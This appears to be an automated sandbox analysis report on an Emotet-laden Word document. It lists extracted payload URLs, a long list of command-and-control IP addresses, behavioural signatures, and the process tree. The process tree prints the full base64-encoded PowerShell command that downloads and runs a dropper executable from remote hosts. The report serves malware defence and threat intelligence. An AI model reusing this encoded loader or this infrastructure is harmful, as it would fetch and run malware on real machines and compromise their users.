Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
30-01-2020 08:36
General
Malware Config
Extracted
http://www.tejasviprabhulkar.com/wp-content/bVK29415/
http://skylines-tec.com/wp-includes/sYYek57/
https://kz.f-chain.com/wp-content/zDYaqX/
http://sittay.com/wp1/trXrrE/
http://www.yitongyilian.com/calendar/LtMHbKKL/
Extracted
emotet
70.184.112.55:80
5.34.158.102:80
144.139.91.187:80
104.236.161.64:8080
89.19.20.202:443
12.162.84.2:8080
74.50.51.115:7080
172.104.169.32:8080
177.188.121.26:443
89.32.150.160:8080
177.103.159.44:80
87.106.46.107:8080
188.135.15.49:80
31.16.195.72:80
119.59.124.163:8080
113.190.254.245:80
77.55.211.77:8080
187.54.225.76:80
200.45.187.90:80
5.196.35.138:7080
81.16.1.45:80
109.166.89.91:80
146.255.96.214:443
72.29.55.174:80
190.191.82.216:80
79.7.114.1:80
94.200.114.162:80
91.83.93.124:7080
204.225.249.100:7080
139.47.135.215:80
201.213.32.59:80
190.195.129.227:8090
50.28.51.143:8080
58.171.38.26:80
207.154.204.40:8080
190.101.144.224:80
113.61.76.239:80
82.8.232.51:80
181.60.244.48:8080
152.231.89.226:80
70.184.69.146:80
91.205.215.57:7080
186.177.165.196:443
186.68.48.204:443
114.109.179.60:80
73.125.15.41:80
68.62.245.148:80
73.239.11.159:80
37.120.185.153:443
217.199.160.224:8080
200.123.183.137:443
93.144.226.57:80
109.169.86.13:8080
202.62.39.111:80
94.200.126.42:80
190.70.1.69:80
195.223.215.190:80
181.10.204.106:80
200.58.83.179:80
189.201.197.98:8080
191.183.21.190:80
120.150.247.164:80
5.88.27.67:8080
190.17.44.48:80
189.19.81.181:443
200.69.224.73:80
188.218.104.226:80
181.29.101.13:8080
190.219.149.236:80
185.94.252.12:80
62.75.160.178:8080
190.186.164.23:80
192.241.143.52:8080
186.15.83.52:8080
151.80.142.33:80
142.93.114.137:8080
178.79.163.131:8080
94.176.234.118:443
190.24.243.186:80
177.103.157.126:80
125.99.61.162:7080
69.163.33.84:8080
144.139.228.113:443
149.62.173.247:8080
87.106.77.40:7080
81.213.78.151:443
68.174.15.223:80
37.187.6.63:8080
188.216.24.204:80
184.172.27.82:8080
185.243.92.42:8080
79.7.158.208:80
2.45.112.134:80
177.242.21.126:80
186.200.205.170:80
80.11.158.65:8080
99.252.27.6:80
91.74.175.46:80
59.120.5.154:80
91.242.136.103:80
200.82.170.231:80
190.100.153.162:443
68.183.190.199:8080
139.162.118.88:8080
118.200.47.120:443
181.36.42.205:443
203.130.0.69:80
203.25.159.3:8080
144.139.228.113:80
212.71.237.140:8080
68.183.170.114:8080
190.210.236.139:80
189.78.156.8:80
129.205.201.163:80
138.68.106.4:7080
191.103.76.34:443
175.139.209.3:8080
181.231.220.232:80
91.72.179.214:80
46.28.111.142:7080
190.210.184.138:995
76.69.26.71:80
82.152.149.79:80
203.45.161.179:443
62.75.143.100:7080
82.196.15.205:8080
190.6.193.152:8080
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4844 WINWORD.EXE 4552 275.exe 4564 275.exe 4612 corsmfidl.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4300 5108 PoWERsheLL.exe 74 -
Executes dropped EXE 3 IoCs
pid Process 4552 275.exe 4564 275.exe 4612 corsmfidl.exe -
Suspicious use of WriteProcessMemory 1 IoCs
description pid Process procid_target PID 4552 wrote to memory of 4564 4552 275.exe 81 -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4564 275.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\275.exe => C:\Windows\SysWOW64\corsmfidl.exe 275.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4844 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4300 PoWERsheLL.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4300 PoWERsheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2d81565b3a488568df69e8fcacd9ca24b4afb50ce479521fbf15e31e65e1311c.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4844
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exePoWERsheLL -e JABZAGUAZQBsAHQAbABrAGEAdQB3AD0AJwBMAGwAZAB4AHIAdgBuAHAAdQBwAGgAeQB0ACcAOwAkAEsAYgB0AGoAbwBwAHcAbwB0AGcAIAA9ACAAJwAyADcANQAnADsAJABZAGYAcgB1AGkAcAB3AG0AYQA9ACcAWQBwAGkAcQBvAGYAdwB5ACcAOwAkAEIAcAB4AHUAcQBmAGoAeABqAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAYgB0AGoAbwBwAHcAbwB0AGcAKwAnAC4AZQB4AGUAJwA7ACQAWgB3AHgAcwBxAG4AaQB4AGcAcwA9ACcARgBjAHAAZQBhAG4AdwBwAHIAdwB1ACcAOwAkAFkAcABtAGQAdwBtAHkAdwBkAHkAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQBUAC4AdwBlAEIAQwBMAEkARQBuAFQAOwAkAEYAdgBvAGcAdwBsAGoAZwB1AGMAYgBzAHgAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB0AGUAagBhAHMAdgBpAHAAcgBhAGIAaAB1AGwAawBhAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFYASwAyADkANAAxADUALwAqAGgAdAB0AHAAOgAvAC8AcwBrAHkAbABpAG4AZQBzAC0AdABlAGMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHMAWQBZAGUAawA1ADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHoALgBmAC0AYwBoAGEAaQBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AegBEAFkAYQBxAFgALwAqAGgAdAB0AHAAOgAvAC8AcwBpAHQAdABhAHkALgBjAG8AbQAvAHcAcAAxAC8AdAByAFgAcgByAEUALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGkAdABvAG4AZwB5AGkAbABpAGEAbgAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ATAB0AE0ASABiAEsASwBMAC8AJwAuACIAUwBgAHAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABBAG0AegBzAHMAdwBpAHMAcwB5AGoAPQAnAFMAYgBuAG8AdQBmAHEAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQByAHoAbQBxAGsAdQB1ACAAaQBuACAAJABGAHYAbwBnAHcAbABqAGcAdQBjAGIAcwB4ACkAewB0AHIAeQB7ACQAWQBwAG0AZAB3AG0AeQB3AGQAeQAuACIARABvAHcAYABOAGwAYABPAEEAYABEAGYASQBsAEUAIgAoACQAQQByAHoAbQBxAGsAdQB1ACwAIAAkAEIAcAB4AHUAcQBmAGoAeABqAGEAKQA7ACQAQQBqAGYAaQBjAG4AdgBkAGIAPQAnAFEAYgBqAGUAbgB2AGUAeAAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEIAcAB4AHUAcQBmAGoAeABqAGEAKQAuACIAbABFAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADMAMAAyADQAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABCAHAAeAB1AHEAZgBqAHgAagBhACkAOwAkAEsAeQB2AHUAYgBjAGIAcABjAD0AJwBIAHkAagBtAG8AZwBmAHgAdgBoAHAAJwA7AGIAcgBlAGEAawA7ACQAQQBlAGsAZwBrAG0AbAB3AD0AJwBaAGgAbgBoAGwAcwBiAG0AYwB2AGEAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAGgAeAByAHAAaQB5AHUAegB0AHUAeAA9ACcARQBxAHcAdABmAGQAagBmAGEAegB1AGUAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4300
-
C:\Users\Admin\275.exeC:\Users\Admin\275.exe1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\275.exe--b390b04e2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4564
-
-
C:\Windows\SysWOW64\corsmfidl.exe"C:\Windows\SysWOW64\corsmfidl.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4612